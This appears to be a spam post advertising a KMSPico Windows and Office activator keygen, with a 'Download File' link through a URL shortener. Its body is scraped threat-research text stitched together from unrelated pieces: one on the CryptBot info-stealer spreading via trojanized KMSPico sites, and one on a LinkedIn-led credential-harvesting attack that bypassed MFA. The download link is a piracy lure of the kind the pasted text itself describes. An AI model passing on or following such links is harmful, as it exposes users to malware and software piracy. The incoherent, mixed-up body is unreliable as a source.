Re: Activator For Windows And Office KMS Pico V17.2 Serial Key Keygen
Emmanuelle Riker
CryptBot is a Windows-based trojan malware that was first discovered in the wild in December 2019. It belongs to the prolific category of information stealers whose primary objective, as the name suggests, is to gather information from infected devices and send it to the threat actor.
Activator for Windows and Office KMS Pico v17.2 Serial Key keygen
Download File https://byltly.com/2yMRfw
ZeuS was reportedly the first info-stealer to be discovered, back in 2006. After its code was leaked, many other variants came to light and have been gaining popularity amongst cyber criminals [1] [2] [3]. Indeed, Inside the SOC has discussed multiple infections across its customer base associated with several types of stealers in the past months [4] [5] [6] [7].
Info-stealers provide a great return on investment (ROI) for threat actors looking to exfiltrate data without having to do the traditional internal reconnaissance and data transfer associated with data theft. Info-stealers are usually cheap to purchase and are available through Malware-as-a-Service (MaaS) offerings, allowing less technical and resourceful threat actors in on the stealing action. This makes them a prevalent threat in the malware landscape.
The techniques employed by info-stealers to gather and exfiltrate data as well as the type of data targeted vary from malware to malware, but the data targeted typically includes login credentials for a variety of applications, financial information, cookies and global information about the infected computer [8]. Given its variety and sensitivity, threat actors can leverage the stolen data in several ways to make a profit. In the case of CryptBot, the data obtained is sold on forums or underground data marketplaces and can be later employed in higher profile attacks [9]. For example, stolen login information has previously been leveraged in credential-based attacks, which can successfully bypass authentication-based security measures, including multi-factor authentication (MFA).
Aside from the update to its malware code, CryptBot regularly updates and refreshes its C2 domains and dropper websites, making it a highly fluctuating malware with constantly new indicators of compromise and distribution sites.
Even though CryptBot is less known than other info-stealers, it was reportedly infecting thousands of devices daily in the first months of 2020 [13] and its continued prevalence resulted in Google taking legal action against its distribution infrastructure at the end of April 2023 [14].
A same network of cracked software websites can be used to download different malware strains, which can result in multiple simultaneous infections. Additionally, these networks often use search engine optimization (SEO) in order to make adverts for their malware distributing sites appear at the top of the Google search results page, thus increasing the chances of the malicious payloads being downloaded.
Furthermore, CryptBot leverages Pay-Per-Install (PPI) services such as 360Installer and PrivateLoader, a downloader malware family used to deliver payloads of multiple malware families operated by different threat actors [18] [19] [20]. The use of this distribution method for CryptBot payloads appears to have stemmed from its 2022 update. According to Google, 161 active domains were associated with 360Installer, of which 90 were associated with malware delivery activities and 29 with the delivery of CryptBot malware specifically. Google further identified hundreds of domains used by CryptBot as C2 sites, all of which appear to be hosted on the .top top-level domain [21].
In some cases observed by Darktrace, after connecting to malvertising websites, devices were seen making encrypted SSL connections to file hosting services such as MediaFire or Mega, while in others devices were observed connecting to an endpoint associated with a content delivery network. This is likely the location from where the malware payload was downloaded alongside cracked software, which is executed by the unsuspecting user. As the user expects to run an executable file to install their desired software, the malware installation often happens without the user noticing.
Some of the malvertising sites observed by Darktrace on customer deployments were crackful[.]com, modcrack[.]net, windows-7-activator[.]com and office-activator[.]com. However, in many cases detected by Darktrace, CryptBot was propagated via websites offering trojanized KMSPico software (e.g., official-kmspico[.]com, kmspicoofficial[.]com). KMSPico is a popular Microsoft Windows and Office product activator that emulates a Windows Key Management Services (KMS) server to activate licenses fraudulently.
Once it has been downloaded and executed, CryptBot will search the system for confidential information and create a folder with a seemingly randomly generated name, matching the regex [a-zA-Z]10, to store the gathered sensitive data, ready for exfiltration.
This data is then sent to the C2 domain via HTTP POST requests on port 80 to the URI /gate.php. As previously stated, CryptBot C2 infrastructure is changed frequently and many of the domains seen by Darktrace had been registered within the previous 30 days. The domain names detected appeared to have been generated by an algorithm, following the regex patterns [a-z]6[0-9]2,3.top or [a-z]6[0-9]2,3.cfd. In several cases, the C2 domain had not been flagged as malicious by other security vendors or had just one detection. This is likely because of the frequent changes in the C2 infrastructure operated by the threat actors behind CryptBot, with new malicious domains being created periodically to avoid detection. This makes signature-based security solutions much less efficient to detect and block connections to malicious domains. Additionally, the fact that the stolen data is sent over regular HTTP POST requests, which are used daily as part of a multitude of legitimate processes such as file uploads or web form submissions, allows the exfiltration connections to blend in with normal and legitimate traffic making it difficult to isolate and detect as malicious activity.
One minute later, at 16:54:19 (UTC), the same device was seen connecting to two mega[.]co[.]nz subdomains and downloading around 13 MB of data from them. As mentioned previously, these connections likely represent the CryptBot payload and cracked software download.
CryptBot info-stealer is fast, efficient, and apt at evading detection given its small size and swift process of data gathering and exfiltration via legitimate channels. Its constantly changing C2 infrastructure further makes it difficult for traditional security tools that really on rules and signatures or known indicators of compromise (IoCs) to detect these infections.
As the usage of a particular social media platform increases, cyber criminals will find ways to exploit the increasing user base, and this trend has been observed with the rise in LinkedIn scams in recent years [2]. LinkedIn is the dominant professional networking site, with a forecasted 84.1million users by 2027 [3]. This platform is data-driven, so users are encouraged to share information publicly, including personal life updates, to boost visibility and increase job prospects [4] [5]. While this helps legitimate recruiters to gain a good understanding of the user, an attacker could also leverage the same personal content to increase the sophistication and success of their social engineering attempts.
Darktrace detected a Software-as-a-Service (SaaS) compromise affecting a construction company, where the attack vector originated from LinkedIn (outside the monitoring of corporate security tools), but then pivoted to corporate email where a credential harvesting payload was delivered, providing the attacker with credentials to access a corporate file storage platform.
It was likely that during the correspondence over LinkedIn, the target user was solicited into following up over email regarding a prospective construction project, using their corporate email account. In a probable attempt to establish a precedent of bi-directional correspondence so that subsequent malicious emails would not be flagged by traditional security tools, the attacker did not initially include suspicious links, attachments or use solicitous or inducive language within their initial emails.
Correspondence between the attacker and target continued for two days after the credential harvesting payload was delivered. Five days later, Darktrace detected an unusual login using multi-factor authentication (MFA) from a rare external IP and ASN that coincided with Darktrace/Email logs showing access to the credential harvesting link.
This attempt to bypass MFA, known as an Office365 Shell WCSS attack, was likely achieved by inducing the target to enter their credentials and legitimate MFA token into the fake Microsoft login page. This was then relayed to Microsoft by the attacker and used to obtain a legitimate session. The attacker then reused the legitimate token to log into Exchange Online from a different IP and registered the compromised device for MFA.
The IP addresses used by the attacker appear to be part of anonymization infrastructure, but are not associated with any known indicators of compromise (IoCs) that signature-based detections would identify [9] [10].
However, the customer had configured Autonomous Response to require human confirmation, therefore no actions were taken until the security team manually approved them over two hours later. In that time, access to mail items and other SharePoint files from the unusual IP address was detected, suggesting a potential loss of confidentiality to business data.
However, it appears that the attacker was able to maintain access to the compromised account, as login and mail access events from 199.231.85[.]153 continued to be observed until the afternoon of the next day.
Security teams are very familiar with social engineering and impersonation attempts, but these attacks remain highly prevalent due to the widespread adoption of technologies that enable these techniques to be deployed with great sophistication and ease. In particular, the popularity of information-rich platforms like LinkedIn that are geared towards connecting with unknown people make it an attractive initial access point for malicious attackers.
b1e95dc632